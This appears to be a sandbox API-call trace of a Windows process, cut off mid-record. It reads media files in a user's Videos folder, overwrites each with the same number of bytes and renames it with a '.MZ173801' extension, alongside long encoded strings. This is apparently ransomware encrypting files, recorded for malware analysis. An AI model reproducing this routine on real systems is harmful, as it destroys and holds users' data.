lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.621] GetCurrentThreadId () returned 0x1358 [0120.621] GetCurrentThreadId () returned 0x1358 [0120.621] GetCurrentThreadId () returned 0x1358 [0120.621] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.621] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.622] GetCurrentThreadId () returned 0x1358 [0120.622] GetCurrentThreadId () returned 0x1358 [0120.622] GetCurrentThreadId () returned 0x1358 [0120.622] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\9_dIdXhT.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\9_didxht.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.622] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0120.622] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.622] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x171df [0120.622] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.622] ReadFile (in: hFile=0x40c, lpBuffer=0x23a47a0, nNumberOfBytesToRead=0x171df, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x23a47a0*, lpNumberOfBytesRead=0x19f14c*=0x171df, lpOverlapped=0x0) returned 1 [0120.624] CloseHandle (hObject=0x40c) returned 1 [0120.625] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\9_dIdXhT.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\9_didxht.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.627] WriteFile (in: hFile=0x40c, lpBuffer=0x23bc7d0*, nNumberOfBytesToWrite=0x171df, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x23bc7d0*, lpNumberOfBytesWritten=0x19f158*=0x171df, lpOverlapped=0x0) returned 1 [0120.629] CloseHandle (hObject=0x40c) returned 1 [0120.632] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\9_dIdXhT.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\9_didxht.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\9_dIdXhT.mp4.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\9_didxht.mp4.mz173801")) returned 1 [0120.632] GetCurrentThreadId () returned 0x1358 [0120.632] GetCurrentThreadId () returned 0x1358 [0120.632] GetCurrentThreadId () returned 0x1358 [0120.632] GetCurrentThreadId () returned 0x1358 [0120.632] GetCurrentThreadId () returned 0x1358 [0120.632] GetCurrentThreadId () returned 0x1358 [0120.632] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bbd2f0, ftCreationTime.dwHighDateTime=0x1d5e5e1, ftLastAccessTime.dwLowDateTime=0x25f86730, ftLastAccessTime.dwHighDateTime=0x1d5e484, ftLastWriteTime.dwLowDateTime=0x25f86730, ftLastWriteTime.dwHighDateTime=0x1d5e484, nFileSizeHigh=0x0, nFileSizeLow=0x1116, dwReserved0=0x1, dwReserved1=0x19f2e4, cFileName="G e-i.swf", cAlternateFileName="GE-I~1.SWF")) returned 1 [0120.632] FileTimeToLocalFileTime (in: lpFileTime=0x19f298, lpLocalFileTime=0x19f1f8 | out: lpLocalFileTime=0x19f1f8) returned 1 [0120.632] FileTimeToDosDateTime (in: lpFileTime=0x19f1f8, lpFatDate=0x19f266, lpFatTime=0x19f264 | out: lpFatDate=0x19f266, lpFatTime=0x19f264) returned 1 [0120.632] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\G e-i.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\g e-i.swf"), fInfoLevelId=0x0, lpFileInformation=0x19f18c | out: lpFileInformation=0x19f18c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bbd2f0, ftCreationTime.dwHighDateTime=0x1d5e5e1, ftLastAccessTime.dwLowDateTime=0x25f86730, ftLastAccessTime.dwHighDateTime=0x1d5e484, ftLastWriteTime.dwLowDateTime=0x25f86730, ftLastWriteTime.dwHighDateTime=0x1d5e484, nFileSizeHigh=0x0, nFileSizeLow=0x1116)) returned 1 [0120.633] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.633] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242e95c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0120.633] GetCurrentThreadId () returned 0x1358 [0120.633] GetCurrentThreadId () returned 0x1358 [0120.633] GetCurrentThreadId () returned 0x1358 [0120.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0120.634] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242eccc, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0120.634] GetCurrentThreadId () returned 0x1358 [0120.634] GetCurrentThreadId () returned 0x1358 [0120.634] GetCurrentThreadId () returned 0x1358 [0120.634] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\G e-i.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\g e-i.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.634] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f140*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f140*=0) returned 0x0 [0120.634] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.634] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x1116 [0120.634] SetFilePointer (in: hFile=0x40c, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f138*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f138*=0) returned 0x0 [0120.634] ReadFile (in: hFile=0x40c, lpBuffer=0x2439f90, nNumberOfBytesToRead=0x1116, lpNumberOfBytesRead=0x19f14c, lpOverlapped=0x0 | out: lpBuffer=0x2439f90*, lpNumberOfBytesRead=0x19f14c*=0x1116, lpOverlapped=0x0) returned 1 [0120.635] CloseHandle (hObject=0x40c) returned 1 [0120.636] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\G e-i.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\g e-i.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x40c [0120.809] WriteFile (in: hFile=0x40c, lpBuffer=0x243bfc0*, nNumberOfBytesToWrite=0x1116, lpNumberOfBytesWritten=0x19f158, lpOverlapped=0x0 | out: lpBuffer=0x243bfc0*, lpNumberOfBytesWritten=0x19f158*=0x1116, lpOverlapped=0x0) returned 1 [0120.810] CloseHandle (hObject=0x40c) returned 1 [0120.811] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\G e-i.swf" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\g e-i.swf"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\di1GF8YsdAcjrR-s\\uP0XF1kok-teK_dZt2-3\\v4vV8\\G e-i.swf.MZ173801" (normalized: "c:\\users\\fd1hvy\\videos\\di1gf8ysdacjrr-s\\up0xf1kok-tek_dzt2-3\\v4vv8\\g e-i.swf.mz173801")) returned 1 [0120.812] GetCurrentThreadId () returned 0x1358 [0120.812] GetCurrentThreadId () returned 0x1358 [0120.812] GetCurrentThreadId () returned 0x1358 [0120.812] GetCurrentThreadId () returned 0x1358 [0120.812] GetCurrentThreadId () returned 0x1358 [0120.812] GetCurrentThreadId () returned 0x1358 [0120.812] FindNextFileW (in: hFindFile=0xa1bd58, lpFindFileData=0x19f284 | out: lpFindFileData=0x19f284*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3636fc0, ftCreationTime.dwHighDateTime=0x1d5eb81, ftLastAccessTime.dwLowDateTime=0xe78a9dc0, ftLastAccessTime.dwHighDateTime=0x1d5e167, ftLastWriteTime.dwLowDateTime=0xe78a9dc0, 